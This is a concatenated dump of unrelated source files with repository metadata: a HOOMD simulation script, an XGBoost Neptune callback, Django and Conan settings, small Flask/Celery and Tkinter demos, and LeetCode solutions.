rigid.set_param('C1', positions=atom_pos2, types=nameList2, diameters=beadsizeList2)
rigid.create_bodies(create=True)
#dump mol2 file
if start==1:
    from gen_wales_diamonds_poly import mol2generator
    mol2generator(system,seed)
# Bond strengths: vertex (A1/A2) bonds are half the edge bond strength.
ebondCC = float(config['MultiSphere Bond Strength'])
ebondCCvert = ebondCC/2.0
###Neighbor list
nl=md.nlist.tree() #bonds are exlcuded from short range interaction by default
nl.reset_exclusions(exclusions = ['bond'])
#parameters for morse potential
#define groups
rigid = group.rigid()
centralrigid = group.rigid_center() #CPs
nonrigid = group.nonrigid() #RNA
integrableparts = group.union(name='int-particles',a=centralrigid, b=nonrigid)
r0 = 0.2
rho = float(config['rho'])
morsecut=2.0
alpha = rho/r0
morse = md.pair.morse(r_cut=morsecut, nlist=nl)
morse.set_params(mode="shift") #This line may have been left out previously!!!
# Default every Morse pair to zero; attractive pairs are enabled later.
morse.pair_coeff.set(['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'],['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'],D0=0,alpha=alpha,r0=r0,r_cut=0.0)
#LJ Interactions:
sigmaTop=2.25 #completely arbitary, to prevent overlap
pol_sigma = float(config['Pol sigma'])
polX1Cut=0.5*(pol_sigma+1.0)
polX2Cut=0.5*(pol_sigma+0.8)
topRepulsion=(ebondCC/4)
topCut=sigmaTop
lj = md.pair.lj(r_cut=topCut, nlist=nl)
lj.set_params(mode="shift")
# Default every LJ pair to zero, then enable the specific repulsions below.
lj.pair_coeff.set(['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'],['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'],alpha=0,epsilon=0,r_cut=0,sigma=0)
lj.pair_coeff.set('TB','TB',alpha=0,epsilon=topRepulsion,r_cut=sigmaTop,sigma=sigmaTop)
lj.pair_coeff.set('TA','TC',alpha=0,epsilon=topRepulsion,r_cut=sigmaTop,sigma=sigmaTop)
#lj.pair_coeff.set(['P'],['BA','BB','BC'],alpha=1,epsilon=ebondCP,r_cut=particleSigma*3.0,sigma=particleSigma)
#even though A-A don't bind, TA-TA repulsion may be necessary to prevent wierd overlapping thing.
lj.pair_coeff.set('TA','TA',alpha=0,epsilon=topRepulsion,r_cut=1.75,sigma=1.75)
lj.pair_coeff.set('TC','TC',alpha=0,epsilon=topRepulsion,r_cut=1.75,sigma=1.75)
lj.pair_coeff.set('TB','TC',alpha=0,epsilon=topRepulsion,r_cut=1.75,sigma=1.75)
lj.pair_coeff.set('TB','TA',alpha=0,epsilon=topRepulsion,r_cut=1.75,sigma=1.75)
#lj.pair_coeff.set('P','BA',alpha=0,epsilon=1,r_cut=polQCut,sigma=polQCut)
#lj.pair_coeff.set('P','BB',alpha=0,epsilon=1,r_cut=polQCut,sigma=polQCut)
#lj.pair_coeff.set('P','BC',alpha=0,epsilon=1,r_cut=polQCut,sigma=polQCut)
lj.pair_coeff.set('P','Q',alpha=0,epsilon=1,r_cut=pol_sigma, sigma=pol_sigma)
lj.pair_coeff.set('P','P',alpha=0,epsilon=1,r_cut=pol_sigma, sigma=pol_sigma)
lj.pair_coeff.set('P',['C0','C1','X1'],alpha=0,epsilon=1,r_cut=polX1Cut,sigma=polX1Cut)
lj.pair_coeff.set('P','X2',alpha=0,epsilon=1,r_cut=polX2Cut,sigma=polX2Cut)
lj.pair_coeff.set('X1','X1',alpha=0,epsilon=1,r_cut=1.0, sigma=1.0)
lj.pair_coeff.set('X2','X2',alpha=0,epsilon=1,r_cut=0.8,sigma=0.8)
lj.pair_coeff.set('X1','X2',alpha=0,epsilon=1,r_cut=0.9,sigma=0.9)
#parameters for polymer
unitLength=1
pol_charge = float(config['Pol charge'])
polBend=0
#polymer
harmonic = md.bond.harmonic()
harmonic.bond_coeff.set('bondPP', k=330.0*unitLength**2, r0=pol_sigma)
# NOTE(review): `harmonic` is rebound here from the bond object to the angle
# object; both remain registered with hoomd, so this only loses the handle.
harmonic = md.angle.harmonic()
harmonic.angle_coeff.set('anglePPP', k=polBend, t0=3.1415)
#yukawa parameters
chargeQ = float(config['Bead charge'])
lDebye = float(config['Debye'])
kappa = 1.0/lDebye
bjerrum= 0.7
# Screened-Coulomb prefactor for beads of diameter pol_sigma.
yukawaPrefactor = bjerrum * lDebye * math.exp(pol_sigma/lDebye)/(lDebye+pol_sigma)
rc = 3.0*lDebye
ron = 2.0*lDebye
print "For Debye length of %f rb, Yukawa Kappa = %f and Yukawa Epsilon = %f" % (lDebye, kappa, yukawaPrefactor)
#polymer-CP interactions
yukawa = md.pair.yukawa(r_cut=rc, nlist=nl)
yukawa.set_params(mode="xplor")
# Default all Yukawa pairs to zero; charged pairs are enabled later.
yukawa.pair_coeff.set(['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'],['C0','C1','P','TA','TB','TC','A1A','A1B','A2A','A2B','A3A','A3B','A4A','A4B','A5A','A5B','A6A','A6B','A1C','A2C','A3C','A4C','A5C','A6C','X1','X2','Q'], epsilon=0, kappa=0, r_cut=0, r_on=0)
yukawa.pair_coeff.set('P', 'P', epsilon=yukawaPrefactor, kappa=kappa, r_cut=rc, r_on=ron)
# Set the integrator
ts = float(config['Time Step Length'])
if start == 1:
firepoly = md.integrate.mode_minimize_fire(dt=ts*0.1, ftol=1e-2, Etol=1e-7)
nve = md.integrate.nve(group=nonrigid)
#while not(firepoly.has_converged()):
# run(100)
run(5000)
nve.disable()
del nve
imode = md.integrate.mode_standard(dt=ts,aniso=True)
langevin = md.integrate.langevin(group=integrableparts, kT=1.0, seed=seed, dscale=1.0)
anim_period = 100000.0/ts
dcd = dump.dcd(filename="sd%s.dcd" % seed, period = anim_period*0.025)
run(50000000)
langevin.disable()
del langevin #hoomd complains if you simply disable the integrator
###TURN ON INTERACTIONS
# NOTE(review): bare types 'A1'..'A6' below do not appear in nameList1/2
# (which define A1A/A1B/... variants) -- confirm these types are defined
# elsewhere or whether these four lines are dead settings.
morse.pair_coeff.set('A1','A1',D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set('A2','A2',D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set('A3','A5',D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set('A4','A6',D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
#Pentameric
morse.pair_coeff.set(['A1B'],['A1B'],D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A2B'],['A2B'],D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A3B'],['A5B'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A4B'],['A6B'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
#Hexameric
#there is no A1C...
morse.pair_coeff.set(['A1A'],['A1B'],D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A2A'],['A2C'],D0=ebondCCvert,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A3A'],['A5C'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A4A'],['A6C'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A5A'],['A3C'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
morse.pair_coeff.set(['A6A'],['A4C'],D0=ebondCC,alpha=alpha,r0=r0,r_cut=2.0)
#yukawa
# Charged bead-bead repulsion and polymer-bead attraction.
yukawa.pair_coeff.set('Q', 'Q', epsilon=yukawaPrefactor*chargeQ**2, kappa=kappa, r_cut=rc, r_on=ron)
#yukawa.pair_coeff.set('P', 'P', epsilon=yukawaPrefactor, kappa=kappa, r_cut=rc, r_on=ron)
yukawa.pair_coeff.set('P', 'Q', epsilon=-yukawaPrefactor*chargeQ, kappa=kappa, r_cut=rc, r_on=ron)
imode = md.integrate.mode_standard(dt=ts,aniso=True)
langevin = md.integrate.langevin(group=integrableparts, kT=1.0, seed=seed, dscale=1.0)
if start != 1:
    # Restart path: the dump objects were not created during equilibration.
    anim_period = 100000.0/ts
    dcd = dump.dcd(filename="sd%s.dcd" % seed, period = anim_period*0.025)
logger = analyze.log(filename="sd%s.log" % seed, quantities=['temperature', 'potential_energy'], period=anim_period)
if start==1:
    gsd_restart = dump.gsd(filename='sd%s_a.gsd' % seed, truncate=True, group=group.all(),period = anim_period , phase=0)
else:
    gsd_restart1 = dump.gsd(filename='sd%s_a.gsd' % seed, truncate=True, group=group.all(), period = anim_period , phase=0)
    gsd_restart2 = dump.gsd(filename='sd%s_b.gsd' % seed, truncate=True, group=group.all(),period = anim_period , phase=0)
runlen = anim_period*20
#runlen = anim_period*10
run(runlen, limit_hours=59.9, limit_multiple=10)
#run(runlen)
| [
"noreply@github.com"
] | jaeilpark.noreply@github.com |
b79a7c32659f9b274e5ad14de8849e7081c53df2 | f28da6013fa8982154a9bcf095fe24931542bfc4 | /tests/python_output/output_sample_3.py | 66698bc023fff2134a74b22811f424ae3fc6c60e | [
"MIT"
] | permissive | aeroshev/CMP | f27419e12e84ec7d1a76475312321d2435158f05 | f4366972dfd752833094920728e4ce11ee58feae | refs/heads/main | 2023-05-08T11:47:52.760928 | 2021-06-05T08:09:47 | 2021-06-05T08:09:47 | 345,696,153 | 0 | 0 | MIT | 2021-05-21T12:39:52 | 2021-03-08T15:08:16 | Python | UTF-8 | Python | false | false | 92 | py | import numpy as np
def stat(x):
n = x + x
m = n + x
s = m + n
return m, s
| [
"aeroshev@mail.ru"
] | aeroshev@mail.ru |
08fb4bda39217af3d3c3ebd272ab70ae0df1799a | 5e19d70c96351bfe62b0269935dabc90e3fa42b6 | /neptunecontrib/monitoring/xgboost_monitor.py | 2105c42c5f829c125db04d0475d0edd58f95574d | [
"MIT"
] | permissive | harupy/neptune-contrib | fd9cff6dd5809b010b77f4641d3e792697e63e4d | 31549483b8deff78b9630d491b3ba716a9396c31 | refs/heads/master | 2022-06-24T05:35:47.186628 | 2020-04-17T09:45:24 | 2020-04-17T09:45:24 | 262,730,503 | 0 | 0 | MIT | 2020-05-11T12:18:11 | 2020-05-10T06:59:52 | null | UTF-8 | Python | false | false | 10,882 | py | #
# Copyright (c) 2020, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import tempfile
import neptune
import xgboost as xgb
def neptune_callback(log_model=True,
log_importance=True,
max_num_features=None,
log_tree=(0,),
experiment=None,
**kwargs):
"""XGBoost callback for Neptune experiments.
This is XGBoost callback that automatically logs training and evaluation metrics, feature importance chart,
visualized trees and trained Booster to Neptune.
Check Neptune documentation for the `full example <https://docs.neptune.ai/integrations/xgboost.html>`_.
Make sure you created an experiment before you start XGBoost training using ``neptune.create_experiment()``
(`check our docs <https://docs.neptune.ai/neptune-client/docs/project.html
#neptune.projects.Project.create_experiment>`_).
Integration works with ``xgboost>=0.82``.
Tip:
Use this `Google Colab <https://colab.research.google.com/github/neptune-ai/neptune-colab-examples
/blob/master/xgboost-integration.ipynb>`_ to try it without further ado.
Args:
log_model (:obj:`bool`, optional, default is ``True``):
| Log booster to Neptune after last boosting iteration.
| If you run xgb.cv, log booster for all folds.
log_importance (:obj:`bool`, optional, default is ``True``):
| Log feature importance to Neptune as image after last boosting iteration.
| Specify number of features using ``max_num_features`` parameter below.
| If you run xgb.cv, log feature importance for each folds' booster.
max_num_features (:obj:`int`, optional, default is ``None``):
| Plot top ``max_num_features`` features on the importance plot.
| If ``None``, plot all features.
log_tree (:obj:`list` of :obj:`int`, optional, default is ``[1,]``):
| Log specified trees to Neptune as images after last boosting iteration.
| If you run xgb.cv, log specified trees for each folds' booster.
| Default is to log first tree.
| If ``None``, do not log any tree.
experiment (:obj:`neptune.experiments.Experiment`, optional, default is ``None``):
| For advanced users only. Pass Neptune
`Experiment <https://docs.neptune.ai/neptune-client/docs/experiment.html#neptune.experiments.Experiment>`_
object if you want to control to which experiment data is logged.
| If ``None``, log to currently active, and most recent experiment.
kwargs:
Parametrize XGBoost functions used in this callback:
`xgboost.plot_importance <https://xgboost.readthedocs.io/en/latest/python/python_api.html
?highlight=plot_tree#xgboost.plot_importance>`_
and `xgboost.to_graphviz <https://xgboost.readthedocs.io/en/latest/python/python_api.html
?highlight=plot_tree#xgboost.to_graphviz>`_.
Returns:
:obj:`callback`, function that you can pass directly to the XGBoost callbacks list, for example to the
``xgboost.cv()``
(`see docs <https://xgboost.readthedocs.io/en/latest/python/python_api.html?highlight=plot_tree#xgboost.cv>`_)
or ``XGBClassifier.fit()``
(`check docs <https://xgboost.readthedocs.io/en/latest/python/python_api.html?highlight=plot_tree
#xgboost.XGBClassifier.fit>`_).
Note:
If you use early stopping, make sure to log model, feature importance and trees on your own.
Neptune logs these artifacts only after last iteration, which you may not reach because of early stop.
Examples:
``xgb.train`` examples
.. code:: python3
# basic usage
xgb.train(param, dtrain, num_round, watchlist,
callbacks=[neptune_callback()])
# do not log model
xgb.train(param, dtrain, num_round, watchlist,
callbacks=[neptune_callback(log_model=False)])
# log top 5 features' importance chart
xgb.train(param, dtrain, num_round, watchlist,
callbacks=[neptune_callback(max_num_features=5)])
``xgb.cv`` examples
.. code:: python3
# log 5 trees per each folds' booster
xgb.cv(param, dtrain, num_boost_round=num_round, nfold=7,
callbacks=neptune_callback(log_tree=[0,1,2,3,4]))
# log only metrics
xgb.cv(param, dtrain, num_boost_round=num_round, nfold=7,
callbacks=[neptune_callback(log_model=False,
log_importance=False,
max_num_features=None,
log_tree=None)])
# log top 5 features per each folds' booster
xgb.cv(param, dtrain, num_boost_round=num_round, nfold=7,
callbacks=[neptune_callback(log_model=False,
max_num_features=3,
log_tree=None)])
``sklearn`` API examples
.. code:: python3
# basic usage with early stopping
xgb.XGBRegressor().fit(X_train, y_train,
early_stopping_rounds=10,
eval_metric=['mae', 'rmse', 'rmsle'],
eval_set=[(X_test, y_test)],
callbacks=[neptune_callback()])
# do not log model
clf = xgb.XGBRegressor()
clf.fit(X_train, y_train,
eval_metric=['mae', 'rmse', 'rmsle'],
eval_set=[(X_test, y_test)],
callbacks=[neptune_callback(log_model=False)])
y_pred = clf.predict(X_test)
# log 8 trees
reg = xgb.XGBRegressor(**params)
reg.fit(X_train, y_train,
eval_metric=['mae', 'rmse', 'rmsle'],
eval_set=[(X_test, y_test)],
callbacks=[neptune_callback(log_tree=[0,1,2,3,4,5,6,7])])
"""
if experiment:
_exp = experiment
else:
try:
neptune.get_experiment()
_exp = neptune
except neptune.exceptions.NoExperimentContext:
msg = 'No currently running Neptune experiment. \n'\
'To start logging to Neptune create experiment by using: `neptune.create_experiment()`. \n'\
'More info in the documentation: '\
'<https://docs.neptune.ai/neptune-client/docs/project.html' \
'#neptune.projects.Project.create_experiment>.'
raise neptune.exceptions.NeptuneException(msg)
assert isinstance(log_model, bool),\
'log_model must be bool, got {} instead. Check log_model parameter.'.format(type(log_model))
assert isinstance(log_importance, bool),\
'log_importance must be bool, got {} instead. Check log_importance parameter.'.format(type(log_importance))
if max_num_features is not None:
assert isinstance(max_num_features, int),\
'max_num_features must be int, got {} instead. ' \
'Check max_num_features parameter.'.format(type(max_num_features))
if log_tree is not None:
if isinstance(log_tree, tuple):
log_tree = list(log_tree)
assert isinstance(log_tree, list),\
'log_tree must be list of int, got {} instead. Check log_tree parameter.'.format(type(log_tree))
def callback(env):
# Log metrics after iteration
for item in env.evaluation_result_list:
if len(item) == 2: # train case
_exp.log_metric(item[0], item[1])
if len(item) == 3: # cv case
_exp.log_metric('{}-mean'.format(item[0]), item[1])
_exp.log_metric('{}-std'.format(item[0]), item[2])
# Log booster, end of training
if env.iteration + 1 == env.end_iteration and log_model:
if env.cvfolds: # cv case
for i, cvpack in enumerate(env.cvfolds):
_log_model(cvpack.bst, 'cv-fold-{}-bst.model'.format(i), _exp)
else: # train case
_log_model(env.model, 'bst.model', _exp)
# Log feature importance, end of training
if env.iteration + 1 == env.end_iteration and log_importance:
if env.cvfolds: # cv case
for i, cvpack in enumerate(env.cvfolds):
_log_importance(cvpack.bst, max_num_features, _exp, title='cv-fold-{}'.format(i), **kwargs)
else: # train case
_log_importance(env.model, max_num_features, _exp, **kwargs)
# Log trees, end of training
if env.iteration + 1 == env.end_iteration and log_tree:
if env.cvfolds:
for j, cvpack in enumerate(env.cvfolds):
_log_trees(cvpack.bst, log_tree, 'trees-cv-fold-{}'.format(j), _exp, **kwargs)
else:
_log_trees(env.model, log_tree, 'trees', _exp, **kwargs)
return callback
def _log_model(booster, name, npt):
with tempfile.TemporaryDirectory(dir='.') as d:
path = os.path.join(d, name)
booster.save_model(path)
npt.log_artifact(path)
def _log_importance(booster, max_num_features, npt, **kwargs):
try:
import matplotlib.pyplot as plt
except ImportError:
raise ImportError('Please install matplotlib to log importance')
importance = xgb.plot_importance(booster, max_num_features=max_num_features, **kwargs)
npt.log_image('feature_importance', importance.figure)
plt.close('all')
def _log_trees(booster, tree_list, img_name, npt, **kwargs):
with tempfile.TemporaryDirectory(dir='.') as d:
for i in tree_list:
file_name = 'tree_{}'.format(i)
tree = xgb.to_graphviz(booster=booster, num_trees=i, **kwargs)
tree.render(filename=file_name, directory=d, view=False, format='png')
npt.log_image(img_name,
os.path.join(d, '{}.png'.format(file_name)),
image_name=file_name)
| [
"noreply@github.com"
] | harupy.noreply@github.com |
9d2e2e509a635d8d7698a89d4e4b939dbc77cb36 | 7591c267059486c943d68e713bd3ff338900d2c5 | /settings.py | 5a2d36ae53de4e39a3fb123b6c4885d77b2de18b | [] | no_license | westinedu/quanenta | 00fe419da1e34ddd9001ffeb9848639d5c58d265 | a59c75458b6eff186637ab8e0e36b6f68a1a99c9 | refs/heads/master | 2021-01-10T20:35:25.196907 | 2012-06-07T06:01:33 | 2012-06-07T06:01:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 846 | py | try:
from djangoappengine.settings_base import *
has_djangoappengine = True
except ImportError:
has_djangoappengine = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
import os
SECRET_KEY = '=r-$b*8hglm+858&9t043hlm6-&6-3d3vfc4((7yd0dbrakhvi'
INSTALLED_APPS = (
'djangotoolbox',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'core',
)
if has_djangoappengine:
INSTALLED_APPS = ('djangoappengine',) + INSTALLED_APPS
TEST_RUNNER = 'djangotoolbox.test.CapturingTestSuiteRunner'
ADMIN_MEDIA_PREFIX = '/media/admin/'
MEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'media')
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), 'templates'),)
LOGIN_URL = '/login/'
LOGOUT_URL = '/logout/'
LOGIN_REDIRECT_URL = '/'
ROOT_URLCONF = 'urls'
| [
"westine@gmail.com"
] | westine@gmail.com |
6247fa905c62f65ef2abaac9127d1e723497625f | b49540e24817b06c28d0cce94ced88af96cb19cb | /Draft 8/run.py | 63c090c7d28c62a75be0834042aeebd347fd402a | [] | no_license | turtlelovesshoes/Social-Metrics | 129610dfa8c78eb7bc0483d834d14e9c087334ea | 929f87a958b206353ec83babb723f06cd66d88ed | refs/heads/master | 2020-03-25T21:56:36.304651 | 2018-11-13T22:24:18 | 2018-11-13T22:24:18 | 144,196,300 | 0 | 0 | null | 2018-09-05T23:54:00 | 2018-08-09T19:41:48 | Python | UTF-8 | Python | false | false | 2,701 | py | # plot 3 data sets by week and by tags
# sort
#Count
#Create new data structure for each tag association
#plot
#plot bins and range
#plot product and
# compare weekly a nd plotlanguage seperatly by numbers of volume
#plot user issue from week to week
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
def main():
#add arugment speficies which commandline options, in this case -f is the input file
parser = argparse.ArgumentParser(description='Read the end of a file')
parser.add_argument('-f', action="store", dest="input_file",
help='this is the filename and path argument')
parser.add_argument('-2f', action="store", dest="second_input_file",
help='this is the filename and path argument of the second data to compare')
parser.add_argument('-3f', action="store", dest="third_input_file",
help='this is the filename and path argument of the second data to compare')
#parser.add_argument('-s', action="store", dest="support_tag_file",
#help='this is the filename and path argument for the support tags')
#parser.add_argument('-p', action="store", dest="product_tag_file",
#help='this is the filename and path argument for the product tags')
#parser.add_argument('-t', action="store", dest="trending_tag_file",
# help='this is the filename and path argument for the trending support tags')
#parser.add_argument('-t', action='store', dest="trending_tag_file", default=None, help="new tags created this release",)
#this one should be optional
#parser.add_argument('-l', action="store", dest="language_tag_file",
# help='this is the filename and path argument for the language tags')
args = parser.parse_args()
#read csvs into nps
week_1 = np.genfromtxt(args.input_file, delimiter = ',')
week_2 = np.genfromtxt(args.second_input_file, delimiter = ',')
week_3 = np.genfromtxt(args.third_input_file, delimiter = ',')
## clean file should be: text, tags(not), locale, conver date
#now what do we do with each of them?
#later create column with positive/negative
print(week_1)
#date gives histogram tag over time
#language gives sorting data
#tag user category gives pivot of sub language
## sort
#Count
#Create new data structure for each tag association
#plot
#plot bins and range - histogram
#plot product - need product txt list
# compare weekly a nd plotlanguage seperatly by numbers of volume
#plot user issue from week to week
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | turtlelovesshoes.noreply@github.com |
27c7d4c198a7b401ca4add37d149c61f3f7e6ebf | 4ea23c1565669386424bd9844ab1de4a26e579d8 | /Exam2_advancedphyton/Q8_finally.py | 399934153e65d2ec25ae73187ea4a6af82d925e8 | [] | no_license | Jishasudheer/phytoncourse | bf0ce8b137c66921c4a98e6b17a74467773baebd | 9c222a3d0a6dd220f69bb344d27ef97154f55d4f | refs/heads/master | 2023-08-31T15:16:26.048596 | 2021-09-16T02:13:10 | 2021-09-16T02:13:10 | 406,445,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | #With error
lst=[8,5,6,9]
try:
print(lst[6])
except:
print("Error occured")
finally:
print("printing finally block")
#without error
lst = [8, 5, 6, 9]
try:
print(lst[2])
except:
print("Error occured")
finally:
print("printing finally block")
| [
"jjishasudheer@gmail.com"
] | jjishasudheer@gmail.com |
06c9b08bec59de708afb24c62c1d6cb182b1548d | cd188cce671fdf1abc3c4e6c8a9d084fa31e502f | /1010-1027 [입출력]/1026.py | 3ca637f6c4b89c5c773803460473d25e456e5bbb | [] | no_license | mjn9ine/codeup-algorithm | 12c6736f680b172e5129f8db50fd775117fe62af | 46e8bd439239a88c00b8dd4d66d7ec0f22805ecd | refs/heads/master | 2023-02-09T02:09:34.477462 | 2021-01-03T08:46:09 | 2021-01-03T08:46:09 | 325,907,330 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42 | py | h, m, s = input().split(':')
print(int(m)) | [
"mjn9ine@gmail.com"
] | mjn9ine@gmail.com |
fa6731a06ce9098c9172e774cfce8c277c87accb | 1e9dd1a7a14b3e1c2fef9d20f6b5a81535176721 | /login.py | 3b39824d0bcc45428b92582be1d7fc722d6330ed | [] | no_license | ryedunn/Password-Generator | e386a7e306953a6ebd2399e91399f0f39234c10d | 89c7df836036d994e17463414a1d1abe87710a8b | refs/heads/main | 2023-07-22T14:29:50.774079 | 2021-08-31T16:35:47 | 2021-08-31T16:35:47 | 397,386,134 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,624 | py | import tkinter as tk
import registration
def main(parent):
parent = tk.Frame(parent)
Login(parent)
parent.mainloop()
return None
class Login:
def __init__(self, parent, *args, **kwargs):
root = tk.Toplevel()
root.title("User Login")
root.geometry("225x150")
# Main Frame
frame_Main = tk.Frame(root)
frame_Main.pack()
self.lbl_Username = tk.Label(
frame_Main,
text="Username:",
).pack()
username_login_entry = tk.Entry(
frame_Main,
textvariable="123",
)
username_login_entry.pack()
self.lbl_Password = tk.Label(
frame_Main,
text="Password:",
).pack()
password_login_entry = tk.Entry(
frame_Main,
textvariable="456",
show="*",
)
password_login_entry.pack()
tk.Label(
frame_Main,
text="",
).pack()
self.btn_frame = tk.Frame(frame_Main)
self.btn_frame.pack()
self.btn_Login = tk.Button(
self.btn_frame,
text="Login",
width=5,
bd=3,
)
self.btn_Login.pack(
side=tk.LEFT,
padx=5,
)
# create a register button
self.btn_Register = tk.Button(
self.btn_frame,
text="Register",
width=5,
bd=3,
command=lambda: registration.main(root),
)
self.btn_Register.pack(
side=tk.RIGHT,
padx=5,
)
| [
"ryedunn@hotmail.com"
] | ryedunn@hotmail.com |
c2aa265e2884ec270c925d8c741df379a8df5a79 | 52abd2ccd1435421f756514a23c73843ea301a35 | /recipes/tket-benchmarks/conanfile.py | b5814206e1e41124d0f2d0cd4b35d8f7d4abe395 | [
"Apache-2.0"
] | permissive | qfizik/tket | 51e684db0f56128a71a18a27d6c660908af391cd | f31cbec63be1a0e08f83494ef7dedb8b7c1dafc8 | refs/heads/main | 2023-08-13T01:20:01.937544 | 2021-09-24T08:09:30 | 2021-09-24T08:09:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 778 | py | # Copyright 2019-2021 Cambridge Quantum Computing
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from conans import ConanFile
class TketBenchmarksConan(ConanFile):
name = "tket-benchmarks"
version = "0.1.0"
requires = "gtest/1.10.0", "benchmark/1.5.1"
# TODO
| [
"alec.edgington@cambridgequantum.com"
] | alec.edgington@cambridgequantum.com |
4e1ee0f644436314a866537f1c3e307cafa91be0 | b93c6069b4025fabc25b2ab69931ff9c7d5c7ef0 | /foo.py | 9edc1840920bf8f99637f59e5b29cc1f4d94b0b7 | [] | no_license | annusachan24/Webapp | 710236f245c8e3c0a70f1024f3af0572e1e186d4 | 083bfefd83a7d9d119142e6d806f5c36d650bfbd | refs/heads/master | 2021-01-12T06:52:57.274335 | 2016-12-19T10:26:08 | 2016-12-19T10:26:08 | 76,851,675 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,434 | py | import os
import random
import time
from celery import Celery
from flask import Flask, request, render_template, session, flash, redirect,url_for, jsonify
app = Flask(__name__)
# Celery configuration
app.config['CELERY_BROKER_URL'] = 'redis://localhost:6379/0'
app.config['CELERY_RESULT_BACKEND'] = 'redis://localhost:6379/0'
# Initialize Celery
celery = Celery(app.name, broker=app.config['CELERY_BROKER_URL'])
celery.conf.update(app.config)
@celery.task(bind=True)
def long_task(self,arg1,arg2):
"""Background task that runs a long function with progress reports."""
verb = ['Starting up', 'Booting', 'Repairing', 'Loading', 'Checking']
adjective = ['master', 'radiant', 'silent', 'harmonic', 'fast']
noun = ['solar array', 'particle reshaper', 'cosmic ray', 'orbiter', 'bit']
message = ''
total = random.randint(10, 50)
res=arg1+arg2
for i in range(total):
if not message or random.random() < 0.25:
message = '{0} {1} {2}...'.format(random.choice(verb),
random.choice(adjective),
random.choice(noun))
self.update_state(state='PROGRESS',
meta={'current': i, 'total': total,
'status': message})
time.sleep(1)
return {'current': 100, 'total': 100, 'status': 'Task completed!',
'result':res}
| [
"annusrcm@gmail.com"
] | annusrcm@gmail.com |
0e89a2204c0ef1e2e5b69d37b8818aae7a708562 | b7c2f96934c752b2fa3b6c8ac3f362d7d30a10f2 | /leet3_LongestSubstring.py | d516e69508760562988c1a1445ba845776cb6c03 | [] | no_license | ZhouZoey/LeetCode-python | a6cc13e8a04053bf002076eb5e42914255acd9cc | 3a65cd370055a9315f41a89e10a19e17bd365cc2 | refs/heads/main | 2023-04-25T05:21:34.756057 | 2021-05-13T11:42:43 | 2021-05-13T11:42:43 | 360,368,092 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | class Solution(object):
def length0fLongestSubstring(self, s: str) -> int:
# 哈希集合,记录每个字符是否出现过
occ = set()
n = len(s)
# 右指针, 初始值为-1, 字符串左边界,还未移动
rk = -1
# 记录长度
ans = 0
for i in range(n):
if i != 0:
# 左指针向右移动一格,移除一个字符
occ.remove(s[i - 1])
while rk + 1 < n and s[rk +1] not in occ:
# 不断移动右指针
occ.add(s[rk + 1])
rk += 1
# 第 i 到 rk 个字符是一个极长的无重复字符串
ans = max(ans, rk - i +1)
return ans
# Hash只用一次遍历
class Solution1(object):
def length0fLongestSubstring(self, s: str) -> int:
k, res, c_dict = -1, 0, {}
for i, c in enumerate(s):
# 重复时
# c_dict > k 一个字符的情况不再继续比较 减少计算
if c in c_dict and c_dict[c] > k:
k = c_dict[c]
c_dict[c] = i
else:
c_dict[c] = i
